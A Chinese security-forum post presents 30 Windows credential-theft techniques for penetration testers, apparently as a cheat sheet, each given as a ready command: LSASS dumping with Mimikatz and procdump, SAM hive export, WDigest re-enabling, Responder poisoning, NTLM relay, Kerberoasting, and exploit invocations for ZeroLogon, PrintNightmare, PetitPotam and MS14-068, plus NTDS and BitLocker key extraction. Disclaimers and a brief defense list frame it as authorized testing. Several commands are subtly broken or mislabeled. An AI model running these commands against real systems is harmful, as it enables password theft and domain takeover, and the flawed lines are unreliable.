XD安全交流

 找回密码
 注册交流

QQ登录

只需一步,快速开始

快捷发帖
查看: 16|回复: 0

攻防实录:渗透测试人员必备的30种Windows凭证获取技巧!

[复制链接]
  • TA的每日心情

    2025-4-18 08:21
  • 签到天数: 1 天

    [LV.1]初来乍到

    9

    主题

    12

    帖子

    136

    积分

    认证安全响应员

    Rank: 2

    积分
    136

    XD社区嘉宾QQ群管理勋章赞助会员

    发表于 2025-4-18 08:24:40 | 显示全部楼层 |阅读模式
    XD论坛免责声明
    本论坛为网络技术研究交流平台,所有内容仅限于学术探讨、防御技术提升及合法授权测试场景。禁止任何主体将本站技术信息用于非法渗透、网络攻击、数据窃取等违法犯罪活动。用户发布内容须符合《网络安全法》《数据安全法》等中国法律法规及所在司法辖区法律要求,禁止传播恶意代码、漏洞利用工具等非法资源。所有技术文档需明确标注适用场景(如:竞赛环境、授权渗透测试),提供实验环境搭建指南及风险控制方案。用户需承诺不利用本平台技术进行未授权测试,因技术滥用导致的法律后果由行为人独立承担。免责条款‌:用户因技术误用导致的系统瘫痪、数据丢失等后果,本平台不承担任何连带责任,技术交流产生的观点分歧及学术争议,不代表本论坛的官方立场,论坛不担保技术文档的绝对安全性,使用者应自行搭建隔离测试环境。
    本帖最后由 小七 于 2025-4-18 08:25 编辑



    在授权渗透测试中,密码凭证的获取往往是突破内网边界的关键。
    本文基于合规测试环境,系统梳理Windows系统密码获取的30种技术手段,同时配套防御方案。

    所有技术内容仅供安全研究使用,实施前必须取得合法授权。


    一、内存凭证提取技术
    1. LSASS进程内存解析
    • • 技术原理:利用Mimikatz的sekurlsa::logonpasswords模块提取登录会话
    • • 典型命令:
      privilege::debug
      sekurlsa::logonpasswords
    • • 防御方案:启用Credential Guard,限制本地管理员权限
    2. 安全描述符转储
    • • 使用PowerShell调用Windows API读取LSASS句柄
      Get-Process lsass | Add-MemberTypeName Security.Descriptor
    3. 进程镜像文件分析
    • • 创建LSASS进程完整dump文件
      procdump.exe -ma lsass.exe lsass.dmp
    4. 非托管代码注入
    • • 通过C#反射加载Mimikatz的PE文件
      Assembly.Load(DecryptPEBytes()).EntryPoint.Invoke()
    5. WDigest缓存提取
    • • 修改注册表强制启用WDigest缓存
      reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
    6. Kerberos票据分析
    • • 使用Rubeus导出当前会话的TGT票据
      Rubeus.exe dump /nowrap
    7. DPAPI凭据解析
    • • 提取Chrome浏览器保存的密码
      SharpChrome.exe logins
    8. 虚拟化环境内存取证
    • • 利用VMSS2Core转换虚拟机快照文件
      vmss2core -W12 vmss.vmem
    二、本地存储凭证提取(7种)9. SAM数据库破解
    • • 通过注册表提取哈希
      reg save HKLM\SYSTEM system.hiv
      reg save HKLM\SAM sam.hiv
    10. LSA Secrets解析
    • • 使用PsExec获取Secrets数据
      psexec.exe -s -i regedit.exe
    11. 组策略首选项漏洞
    • • 解密cpassword字段
      gpp-decrypt ED4C7D3FE97C3B42
    12. 计划任务凭据残留
    • • 解析XML文件中的RunAsUser字段
      Get-ScheduledTask | Select-Object TaskName,Principal
    13. IIS应用程序池配置
    • • 解密applicationHost.config中的密码
      aspnet_regiis -pdf "connectionStrings" .
    14. 远程桌面凭据管理器
    • • 使用cmdkey列出保存的凭据
      cmdkey /list
    15. PowerShell历史记录审计
    • • 检索控制台历史文件
      Get-Content (Get-PSReadlineOption).HistorySavePath
    三、网络协议攻击(5种)16. LLMNR/NBT-NS投毒
    • • 使用Responder捕获NetNTLMv2哈希
      python Responder.py -I eth0 -wFb
    17. SMB中继攻击
    • • 配置ntlmrelayx进行哈希转发
      ntlmrelayx.py -tf targets.txt -smb2support
    18. Kerberoasting攻击
    • • 请求服务票据进行离线破解
      GetUserSPNs.py -request 'domain/user:password'
    19. AS-REP Roasting
    • • 提取不需要预认证的用户哈希
      Rubeus.exe asreproast /format:hashcat
    20. RDP会话劫持
    • • 利用tscon服务进行会话接管
      query user
      tscon %ID% /dest:%SESSIONNAME%
    四、漏洞利用技术(5种)21. ZeroLogon(CVE-2020-1472)
    • • 重置域控机器账户密码
      zerologon_tester.py dc_name 192.168.1.1
    22. PrintNightmare(CVE-2021-1675)
    • • 通过打印机服务提权
      python3 CVE-2021-1675.py -u user -p password -d domain 192.168.1.1
    23. PetitPotam(CVE-2021-36942)
    • • 强制域控认证
      python3 petitpotam.py -d domain -u user -p password 192.168.1.1 192.168.1.2
    24. SAM账户名混淆(CVE-2021-42278)
    • • 创建伪造的域控账户
      sam_the_admin.py -domain lab.com -dc-ip 192.168.1.1
    25. MS14-068 Kerberos漏洞
    • • 伪造黄金票据
      goldenPac.py domain/user:password@dc.domain.com
    五、其他高级技术(5种)26. 域控数据库提取
    • • 使用ntdsutil创建快照
      ntdsutil "ac i ntds" "ifm" "create full C:\temp" q q
    27. 组策略脚本审计
    • • 检索所有GPO中的登录脚本
      Get-GPO -All | Get-GPOReport -ReportType XML
    28. WMI永久事件订阅
    • • 创建密码记录触发器
      __EventFilter和__EventConsumer绑定
    29. 卷影副本分析
    • • 通过VSS访问历史文件
      vssadmin list shadows
      mklink /d C:\shadowcopy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\
    30. BitLocker恢复密钥提取
    • • 从AD中获取恢复密钥
      Get-ADObject -Filter {objectclass -eq 'msFVE-RecoveryInformation'}
    【防御建议】
    • 1. 启用LSA保护(RunAsPPL)
    • 2. 部署Windows Defender Credential Guard
    • 3. 强制实施NTLM禁用策略
    • 4. 定期审计域控事件日志(ID 4662)
    • 5. 实施JEA(Just Enough Administration)权限模型
    • 6. 配置Kerberos AES加密强制策略
    • 7. 部署网络访问控制(802.1X)
    • 8. 启用Windows事件转发集中收集


    XD论坛免责声明
    本论坛为网络技术研究交流平台,所有内容仅限于学术探讨、防御技术提升及合法授权测试场景。禁止任何主体将本站技术信息用于非法渗透、网络攻击、数据窃取等违法犯罪活动。用户发布内容须符合《网络安全法》《数据安全法》等中国法律法规及所在司法辖区法律要求,禁止传播恶意代码、漏洞利用工具等非法资源。所有技术文档需明确标注适用场景(如:竞赛环境、授权渗透测试),提供实验环境搭建指南及风险控制方案。用户需承诺不利用本平台技术进行未授权测试,因技术滥用导致的法律后果由行为人独立承担。免责条款‌:用户因技术误用导致的系统瘫痪、数据丢失等后果,本平台不承担任何连带责任,技术交流产生的观点分歧及学术争议,不代表本论坛的官方立场,论坛不担保技术文档的绝对安全性,使用者应自行搭建隔离测试环境。
    回复

    使用道具 举报

    懒得打字嘛,点击右侧快捷回复 【右侧内容,后台自定义】
    您需要登录后才可以回帖 登录 | 注册交流

    本版积分规则

    QQ|Archiver|手机版|小黑屋|小段安全交流论坛 ( 冀ICP备2024093090号-1 )

    GMT+8, 2025-4-30 23:38 , Processed in 0.129922 second(s), 31 queries .

    Powered by Discuz! X3.4

    Copyright © 2001-2020, Tencent Cloud.

    快速回复 返回顶部 返回列表